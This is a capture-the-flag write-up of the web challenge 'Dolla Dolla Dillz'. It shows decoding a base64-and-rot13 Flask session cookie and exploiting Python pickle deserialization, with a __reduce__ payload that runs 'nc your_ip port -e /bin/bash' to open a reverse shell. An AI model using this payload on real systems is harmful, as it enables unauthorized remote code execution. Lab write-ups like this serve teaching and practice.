Dolla Dolla Dillz Writeup by Srdnlen
Category: WEB. Solves: 8 Points: 200
made by: ollien
Note: cataas.com is NOT part of this challenge
The website looks pretty simple in the frontend, we have a login form and a registration form in which we tried some injections that didn't work, after we log-in we have a random image but nothing interesting. On the cookie side we have some interesting stuff, after we register a cookie is set that then disappears when we get redirected to the login form where we get a message of successful registration
From this cookie we understand that flask is runnign in the backend and this is important.
Then we login and another cookie is set, a token that looks like a base64 but after some tries and with the help of prevoius years writeups we discover that it was encoded as a base64 and rot13. After we decode it we obtain this:
cdbal Session q)q}qXtokenqX$bb05b8da-82f1-11ea-a968-0242ac120003qsb.
So we have some readable stuff, enough to start googling about dbal, python and session tokens. After a while we find something about pickle library in python which is vulnerable to deserialization of cookies (something similar to the more known php deserialization).
Knowing this we try to deserialize the cookie we have so that we can analyze the object but we need to implement a custom module named dbal and in it we need a class Session (python runtime errors suggested this stuff). So after we are able to pickle.loads(cookie) we are also able to create a custom Session object in which we put a
<code>reduce</code> function that can execute any command we want. First we try with a simple "ls" but it doesn't work because we have no visual feedback in the website so we need to create a reverse shell. To do that we use the following python scripts to create the cookie we need:
import os class Session: def __reduce__(self): return (os.system, ('nc your_ip port -e /bin/bash', ))
import base64 import pickle import os import dbal def rot13(s): from codecs import encode return encode(s, 'rot13') token = "tNAwMTWuoNcGMKAmnJ9hPaRNXLSkNK1kNytSNNNNqT9eMJ5kN1txNNNNAGp5MQH5Z2RgBQR1Mv0kZJIuYJSxAwLgZQV0ZzSwZGVjZQNmpDEmLv4=" rotted = rot13(token) based = base64.b64decode(rotted) pickled = pickle.loads(based) print(pickled) pickled2 = rot13(str(base64.b64encode(pickle.dumps(pickled)))) pickled2 = pickled2[2:len(pickled2)-1] print(pickled2)
So we generate a token that will execute our reverse shell
We send it with burp
And we receive reverse shell